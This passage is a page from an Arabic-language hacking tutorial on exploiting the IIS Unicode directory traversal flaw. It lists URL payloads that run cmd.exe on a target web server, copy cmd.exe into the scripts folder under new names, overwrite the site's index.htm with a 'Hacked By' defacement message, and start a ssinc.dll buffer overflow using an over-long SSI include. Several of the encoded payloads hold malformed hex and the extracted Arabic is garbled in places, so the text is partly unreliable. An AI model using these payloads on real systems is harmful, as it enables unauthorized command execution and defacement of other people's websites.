‫‪:‬عليك القيا م اول ًا بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي‬

‫‪http://www.xxxx.com/msadc/hEx.mdb‬‬

                                                                 ‫‪ -‬طريقة تصطبيق هذه الثغرات ‪.‬‬
                              ‫تطبيق الثغر ة على الموقع من خلل المتصفح تتم حسب الامثلة التالية ‪-:‬‬
‫‪\:http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c‬‬
‫‪\:http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c‬‬

                                                        ‫وقد نبحتاج الى تغيير مسمى الدليل بحيث يكون ‪-:‬‬

     ‫‪Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin‬‬

                            ‫‪ -‬كيفية اختتصار ثغرة اليونيكود حتى تصتمكن من تصفعيل امر الـ ‪. ECHO‬‬
               ‫في حالة اكتشاف موقع يعانبي من مشكلة اليونبيكود ولنفترض انبه كان على هذه الثغر ة ‪-:‬‬
‫‪\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c‬‬

         ‫فنحتاج الى نبسخ ملف ‪ w3svc.exe‬الى مجلد ‪ inetpub\scripts‬والامر يكون بهذه الطريقة ‪-:‬‬

‫?‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe‬‬
‫‪c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe‬‬

   ‫بعد نبسخ ملف ‪ w3svc.exe‬الى مجلد ‪ ، inetpub\scripts‬الان نبقو م بتصفح الموقع من خلل الثغر ة‬
                                                                                     ‫بهذه الطريقة ‪-:‬‬

‫‪\:http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c‬‬
  ‫الان نبستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل‬
                               ‫‪ inetpub\wwwroot\index.htm‬بحيث يكون الامر بالشكل التالي ‪-:‬‬

‫‪http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co‬‬
‫‪m+>+c:\inetpub\wwwroot\index.htm‬‬

                                ‫‪ -‬طريقة نسخ ملف الـ ‪ CMD‬لتصاحة امكانية الكتابة على الملفات ‪.‬‬
‫الغرض من نبسخ ملف الـ ‪ CMD‬وهو لاعطاء امكانبية للكتابة داخل السيرفر في بعض الحالات ويتم نبسخه‬

                                                                  ‫الى مجلد السيكربت بهذه الطريقة ‪-:‬‬

‫?‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe‬‬
‫‪c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe‬‬

                     ‫الان بامكانبنا استخدا م ملف الـ ‪ CMD‬الجديد في الثغر ة بدلا من الاول بهذا الشكل ‪-:‬‬
‫‪\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c‬‬

                                ‫‪ -‬كيفية معرفة مشكلة الـ ‪ Access Denied‬والحلول المتبعة لها ‪.‬‬
‫تتم معرفة مشكلة الـ ‪ Access Denied‬من خلل المحاولة في حذف أي ملف من أي امتداد ‪ ،‬فعند‬

‫ظهور رسالة الـ ‪ Access Denied‬فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم‬

     ‫اكثر على السيرفر ‪-:‬‬

‫‪ -1‬الطريقة الاولى نبسخ ملف الـ ‪ CMD‬الى دليل السيكربت بمسمى ‪ CMD1‬فسوف يتاح لك امكانبية‬

‫الكتابة باستخدا م الامر ‪ Copy‬باستخدا م هذا الامر ‪-:‬‬

‫?‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe‬‬

‫‪c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe‬‬                                       ‫‪-2‬‬

                                  ‫الطريقة الثانية بالتعامل مع الملف ‪ ssinc.dll‬والطريقة كما يلي ‪-:‬‬
                                                      ‫‪ o‬اول انشاء صفحة باسم ‪test.shtml‬‬

                                  ‫‪ o‬تصكون هذه الصفحة داختل مجلد ‪wwwroot/hEx/test.shtml‬‬
‫‪ o‬كتابة هذا الكود داختل الصفحة >!‪ <--"include file="AAAA[...]AA#--‬بحيث ان حرف ‪ A‬يتم‬

                                                      ‫كتابتة حتى يتعدى ‪ 2049‬حرف ‪.‬‬

‫‪130‬‬